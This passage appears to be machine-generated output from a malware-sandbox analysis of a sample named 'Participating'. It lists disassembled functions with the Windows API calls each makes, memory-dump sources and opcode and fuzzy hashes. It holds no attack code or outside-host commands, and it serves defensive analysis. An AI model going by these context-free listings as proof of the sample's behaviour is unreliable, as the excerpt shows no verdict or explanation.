                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CF05432241258BFE7215B629C0EEEF3F7DEFC6B11F000059FA09D1290E7A05A81C6B5
                                                                                                                                                                                                                                                                  Function 00D234D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?), ref: 00D234EF
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00D23506
                                                                                                                                                                                                                                                                  • GetWindowDC.USER32(?), ref: 00D23512
                                                                                                                                                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00D23521
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00D23533
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 00D2354D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 272304278-0
                                                                                                                                                                                                                                                                  • Opcode ID: 70494fa2695df5a70a7a8abfe197645838e8c320b630ba3df2101608b0ef4190
                                                                                                                                                                                                                                                                  • Instruction ID: 0f5f79b28b8ab8ceb898217a76c2bf6076d61db7785553498e8f21dc9507342f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70494fa2695df5a70a7a8abfe197645838e8c320b630ba3df2101608b0ef4190
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE014B31500215EFDB505F64DC08BED7BB6FF14321F540160FA1EE22A0DB311E91AB20
                                                                                                                                                                                                                                                                  Function 00D421C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D421CC
                                                                                                                                                                                                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 00D421D8
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00D421E1
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00D421E9
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00D421F2
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D421F9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 146765662-0
                                                                                                                                                                                                                                                                  • Opcode ID: 47b98eadd9003cff390e0692348c3dcd74716d75b8f0b75202031876e850bac4
                                                                                                                                                                                                                                                                  • Instruction ID: 6a2687b01f34afa380ef751377921c2d5898eeba0edf36eaed49d6d0bc065e70
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47b98eadd9003cff390e0692348c3dcd74716d75b8f0b75202031876e850bac4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9E0E576004305BBDB011FA1EC0C90ABF3AFF59322B504220F629C6670EB3294A0DB60
                                                                                                                                                                                                                                                                  Function 00D4CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE41EA: _wcslen.LIBCMT ref: 00CE41EF
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D4CF99
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4CFE0
                                                                                                                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D4D047
                                                                                                                                                                                                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00D4D075
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 6fa21d8fff9a23290dd66d107e4eb52c9ca25570c09c0db31421914821e895b1
                                                                                                                                                                                                                                                                  • Instruction ID: b1a979f0e9e58ce0cf0604fba142df822c4cb3c4971771bbc1887b53a177c821
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6fa21d8fff9a23290dd66d107e4eb52c9ca25570c09c0db31421914821e895b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9851FE71615300ABD724AF28C845B6BBBEAEF45314F080A2DF999D32E0DB74CD498772
                                                                                                                                                                                                                                                                  Function 00D6B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00D6B903
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE41EA: _wcslen.LIBCMT ref: 00CE41EF
                                                                                                                                                                                                                                                                  • GetProcessId.KERNEL32(00000000), ref: 00D6B998
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D6B9C7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                  • String ID: <$@
                                                                                                                                                                                                                                                                  • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                  • Opcode ID: 36d651ab0c095c779c81557208014f960c5a67d5ec1f89ab166d1736bb3475af
                                                                                                                                                                                                                                                                  • Instruction ID: 7dc25a10e13d6e14624909a7749d64e0de234a17efa01ccd881eee5c639c0f5c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36d651ab0c095c779c81557208014f960c5a67d5ec1f89ab166d1736bb3475af
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38713875A00259DFCB14EF55C494AAEBBF5EF08310F04849AE859AB352CB74ED85CBA0
                                                                                                                                                                                                                                                                  Function 00D47B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D47B6D
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00D47BA3
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00D47BB4
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D47C36
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                  • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                  • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                  • Opcode ID: 6bab7cab95ee0ddeb83e74e0f970a8c930d201bc11c32e5fc20a4dae72b9871e
                                                                                                                                                                                                                                                                  • Instruction ID: a7615b11a38436c752e6197fd13c1cd02d7502fcb118203e30d62c62d2c44ff6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6bab7cab95ee0ddeb83e74e0f970a8c930d201bc11c32e5fc20a4dae72b9871e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11414BB1604304EFDB15DF64D8C4A9A7BB9EF44314B1880A9AD0AEF246D7B1D944CBB0
                                                                                                                                                                                                                                                                  Function 00D74818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D748D1
                                                                                                                                                                                                                                                                  • IsMenu.USER32(?), ref: 00D748E6
                                                                                                                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D7492E
                                                                                                                                                                                                                                                                  • DrawMenuBar.USER32 ref: 00D74941
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 6bf47a3ba5ec5e6e43aa3a8127547b576194b78e4f21e949796831a1ad0fbf1c
                                                                                                                                                                                                                                                                  • Instruction ID: 6a1c1b5b4c7235fc8a0598b4f6027add4e059958e22285beaf172778598f6fc8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6bf47a3ba5ec5e6e43aa3a8127547b576194b78e4f21e949796831a1ad0fbf1c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54412775A01209EFDB11CF95D884AABBBB9FF06324F088129EA5997350E730ED44CF60
                                                                                                                                                                                                                                                                  Function 00D4272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00D44620
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00D427B3
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00D427C6
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00D427F6
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                  • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                  • Opcode ID: 6aa57cd072c0d673232aac2b3a3182019c5d3e13306c9c92874b9136500ffa11
                                                                                                                                                                                                                                                                  • Instruction ID: 27b741f4884dbf0e83d223af7cd9c7d7f50315502378f433dc151e3ec156ac61
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6aa57cd072c0d673232aac2b3a3182019c5d3e13306c9c92874b9136500ffa11
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4212171900204BFDB09ABA0CC46DFFBBB9DF45360B444129F426A32E0DB34894A9670
                                                                                                                                                                                                                                                                  Function 00D739B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00D73A29
                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00D73A30
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00D73A45
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00D73A4D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                  • String ID: SysAnimate32
                                                                                                                                                                                                                                                                  • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                  • Opcode ID: be93588b6d97906036be4165beffc84f742d7775d33e2f681ccaf329ab73230d
                                                                                                                                                                                                                                                                  • Instruction ID: 5fa4c6718e420fe636215df8207c0313d237ec72559eba21e0634005fcfea506
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be93588b6d97906036be4165beffc84f742d7775d33e2f681ccaf329ab73230d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51219D71600309AFEB109F64DC82EBB77A9EF45364F149218FA99D2190E771CD91AB70
                                                                                                                                                                                                                                                                  Function 00D050DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D0508E,?,?,00D0502E,?,00DA98D8,0000000C,00D05185,?,00000002), ref: 00D050FD
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D05110
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00D0508E,?,?,00D0502E,?,00DA98D8,0000000C,00D05185,?,00000002,00000000), ref: 00D05133
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                  • Opcode ID: 91e075486a19c4557ed64dcd66fa5dbce80cccae5caa060bd0bfe87cc64f9fed
                                                                                                                                                                                                                                                                  • Instruction ID: 3c209597fc44ab3b932975acc9713df8cb7256aca6f1d2ac9c07c9baf3faf9c4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91e075486a19c4557ed64dcd66fa5dbce80cccae5caa060bd0bfe87cc64f9fed
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20F03134900708BBDB119F94DC49BAEBFB9EF44752F440068B809E22A0DB745995CAB5
                                                                                                                                                                                                                                                                  Function 00CE663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00CE668B,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE664A
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00CE665C
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00CE668B,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE666E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                  • Opcode ID: 1932ebbb18662af886e5dda0029ef106d3492e263cdedfd2ef0a0d59bd0ac6af
                                                                                                                                                                                                                                                                  • Instruction ID: 57c2c56e99471126d40bee4b7adf0aa7d6d1bd9cfa4fa8946c092c0f54408205
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1932ebbb18662af886e5dda0029ef106d3492e263cdedfd2ef0a0d59bd0ac6af
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CE0CD356217625BD2121B26BC0CB5EB67D9FD2F52B450115FC08E2300EFB0CD4185F5
                                                                                                                                                                                                                                                                  Function 00CE6607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D25657,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE6610
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00CE6622
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00D25657,?,?,00CE62FA,?,00000001,?,?,00000000), ref: 00CE6635
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                  • Opcode ID: a391f17293d3d8d092c9fb98c59dd68c927842ed7f5ea2f0755974d7256b374d
                                                                                                                                                                                                                                                                  • Instruction ID: 466257a99b07ac9639f23fa6f9b95be4782e6f2f80bb4750b00290587e11bf11
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a391f17293d3d8d092c9fb98c59dd68c927842ed7f5ea2f0755974d7256b374d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCD012356727715B46222F266C1898E7B2A9FE6B613450015BC18E3214EF70CE45C5B8
                                                                                                                                                                                                                                                                  Function 00D53306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
